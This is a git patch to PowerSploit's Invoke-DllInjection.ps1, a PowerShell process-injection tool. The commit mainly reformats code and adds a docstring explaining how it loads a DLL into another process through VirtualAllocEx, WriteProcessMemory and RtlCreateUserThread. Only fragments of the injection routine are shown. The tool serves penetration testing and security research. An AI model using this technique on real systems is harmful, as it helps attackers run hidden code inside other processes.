From 1980f403ee78234eae4d93b50890d02f827a099f Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Wed, 14 Dec 2016 17:50:37 -0500 Subject: For ./CodeExecution/ : -PSScriptAnalyzering -Tweaking of synopsis blocks in order to support platyPS -Code standardization -Generated docs --- CodeExecution/Invoke-DllInjection.ps1 | 60 +++++++++++++++++++---------------- 1 file changed, 33 insertions(+), 27 deletions(-) (limited to 'CodeExecution/Invoke-DllInjection.ps1') diff --git a/CodeExecution/Invoke-DllInjection.ps1 b/CodeExecution/Invoke-DllInjection.ps1 index 369d606..d23e989 100644 --- a/CodeExecution/Invoke-DllInjection.ps1 +++ b/CodeExecution/Invoke-DllInjection.ps1 @@ -5,15 +5,19 @@ function Invoke-DllInjection Injects a Dll into the process ID of your choosing. -PowerSploit Function: Invoke-DllInjection -Author: Matthew Graeber (@mattifestation) -License: BSD 3-Clause -Required Dependencies: None -Optional Dependencies: None +PowerSploit Function: Invoke-DllInjection +Author: Matthew Graeber (@mattifestation) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None .DESCRIPTION Invoke-DllInjection injects a Dll into an arbitrary process. +It does this by using VirtualAllocEx to allocate memory the size of the +DLL in the remote process, writing the names of the DLL to load into the +remote process spacing using WriteProcessMemory, and then using RtlCreateUserThread +to invoke LoadLibraryA in the context of the remote process. .PARAMETER ProcessID @@ -40,6 +44,8 @@ Use the '-Verbose' option to print detailed information. http://www.exploit-monday.com #> + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] Param ( [Parameter( Position = 0, Mandatory = $True )] [Int] @@ -59,7 +65,7 @@ http://www.exploit-monday.com { Throw "Process does not exist!" } - + # Confirm that the path to the dll exists try { @@ -79,11 +85,11 @@ http://www.exploit-monday.com Param ( [OutputType([Type])] - + [Parameter( Position = 0)] [Type[]] $Parameters = (New-Object Type[](0)), - + [Parameter( Position = 1 )] [Type] $ReturnType = [Void] @@ -98,7 +104,7 @@ http://www.exploit-monday.com $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) $MethodBuilder.SetImplementationFlags('Runtime, Managed') - + Write-Output $TypeBuilder.CreateType() } @@ -107,11 +113,11 @@ http://www.exploit-monday.com Param ( [OutputType([IntPtr])] - + [Parameter( Position = 0, Mandatory = $True )] [String] $Module, - + [Parameter( Position = 1, Mandatory = $True )] [String] $Procedure @@ -128,7 +134,7 @@ http://www.exploit-monday.com $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) $tmpPtr = New-Object IntPtr $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) - + # Return the address of the function Write-Output $GetProcAddress.Invoke($null, @([System.Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) } @@ -142,43 +148,43 @@ http://www.exploit-monday.com [String] $Path ) - + # Parse PE header to see if binary was compiled 32 or 64-bit $FileStream = New-Object System.IO.FileStream($Path, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read) - + [Byte[]] $MZHeader = New-Object Byte[](2) $FileStream.Read($MZHeader,0,2) | Out-Null - + $Header = [System.Text.AsciiEncoding]::ASCII.GetString($MZHeader) if ($Header -ne 'MZ') { $FileStream.Close() Throw 'Invalid PE header.' } - + # Seek to 0x3c - IMAGE_DOS_HEADER.e_lfanew (i.e. Offset to PE Header) $FileStream.Seek(0x3c, [System.IO.SeekOrigin]::Begin) | Out-Null - + [Byte[]] $lfanew = New-Object Byte[](4) - + # Read offset to the PE Header (will be read in reverse) $FileStream.Read($lfanew,0,4) | Out-Null - $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | % { $_.ToString('X2') } ) -join '')) - + $PEOffset = [Int] ('0x{0}' -f (( $lfanew[-1..-4] | ForEach-Object { $_.ToString('X2') } ) -join '')) + # Seek to IMAGE_FILE_HEADER.IMAGE_FILE_MACHINE $FileStream.Seek($PEOffset + 4, [System.IO.SeekOrigin]::Begin) | Out-Null [Byte[]] $IMAGE_FILE_MACHINE = New-Object Byte[](2) - + # Read compiled architecture $FileStream.Read($IMAGE_FILE_MACHINE,0,2) | Out-Null - $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | % { $_.ToString('X2') } ) -join '') + $Architecture = '{0}' -f (( $IMAGE_FILE_MACHINE[-1..-2] | ForEach-Object { $_.ToString('X2') } ) -join '') $FileStream.Close() - + if (($Architecture -ne '014C') -and ($Architecture -ne '8664')) { Throw 'Invalid PE header or unsupported architecture.' } - + if ($Architecture -eq '014C') { Write-Output 'X86' @@ -193,7 +199,7 @@ http://www.exploit-monday.com } } - + # Get addresses of and declare delegates for essential Win32 functions. $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) @@ -307,7 +313,7 @@ http://www.exploit-monday.com { Throw "Unable to launch remote thread. NTSTATUS: 0x$($Result.ToString('X8'))" } - + $VirtualFreeEx.Invoke($hProcess, $RemoteMemAddr, $Dll.Length, 0x8000) | Out-Null # MEM_RELEASE (0x8000) # Close process handle @@ -317,7 +323,7 @@ http://www.exploit-monday.com # Extract just the filename from the provided path to the dll. $FileName = (Split-Path $Dll -Leaf).ToLower() - $DllInfo = (Get-Process -Id $ProcessID).Modules | ? { $_.FileName.ToLower().Contains($FileName) } + $DllInfo = (Get-Process -Id $ProcessID).Modules | Where-Object { $_.FileName.ToLower().Contains($FileName) } if (!$DllInfo) { -- cgit v1.2.3